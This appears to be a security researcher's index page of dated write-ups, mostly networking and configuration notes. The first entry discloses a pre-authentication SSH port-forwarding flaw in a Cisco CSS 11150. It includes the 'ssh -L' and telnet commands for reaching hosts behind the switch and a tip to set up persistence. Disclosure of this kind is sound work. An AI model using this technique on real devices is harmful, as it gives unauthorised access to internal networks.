Documents

Cisco Content Services Switch pre-auth ssh port forwarding vulnerability (21 Oct 2011)

Ok, I will admit, the Cisco CSS 11150 is old (this one was running software version 07.40.00.04). But, I still think this is useful information; I wasn't able find this particular bug anywhere. Anyway; the deal is this: If the CSS is running SSHd, it is possible to local (and possibly remote) port forward without having to authenticate. E.g.:

$ ssh -L 11123:hostonotherside:23 csshost User Access Verification Username:

.. will allow the attacker to do:

$ telnet 127.0.0.1 11123 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. login:

And get a login prompt on the host on the other side of the CSS. This was certainly useful in my case. One caveat: the CSS will time out the ssh login, so you only have a small window to create something more permanent!

Tunneling between a Cisco and an OpenBSD system to attack LAN targets (07 Sep 2011)

A few words on how to create a GRE tunnel together with NAT to attack systems on a remote LAN. Look at the really awful graphic here. Keywords: compromise, cisco, openbsd, gre tunnel, nat, attack tools

Getting WWAN to work at full speed on a T61p (28 Jul 2008)

I recently got a Lenovo T61p with a nice data plan, but found that by default, Ubuntu 8.04 didn't give me the full speed of the onboard Sierra Wireless MC8755 device. After some trial and error and some Googling, I got it working at full speed and put the effort into words here.

Pheasting on the Crumbs of Misconfigured Networks (31 Jan 2006)

This is a PDF of a paper I wrote last year about poorly configured DNS resolvers. While it's not rocket science, it's interesting that it happens as often as it does. Watch this space for updates to statistics. (Keywords: phisting, dns, resolv.conf, isa server)

Configuring the Exim MTA for SMTP AUTH and TLS (2005?)

SMTP AUTH is great. Configuring your MTA to support this ensures that all your users can use the mail server when they're out on the road. But unless you ensure that the session is encrypted, your users' credentials may find themselves in the hands of spammers or worse (ensure that your server's certificate is trusted to prevent man-in-the-middle attacks!). Configure Exim so that it supports TLS, then have a look here for a quick description on how to configure SMTP AUTH securely.

Wonder what 'lomscan.exe' is? (ca. 2001)

It's part of an attacker's toolset. A short note on it can be found here.

Need a simple configuration for a Cisco ISDN (BRI) router? (ca. 1999)

Look here. This works (worked?) with BT ClickFree. Probably a discontinued product now.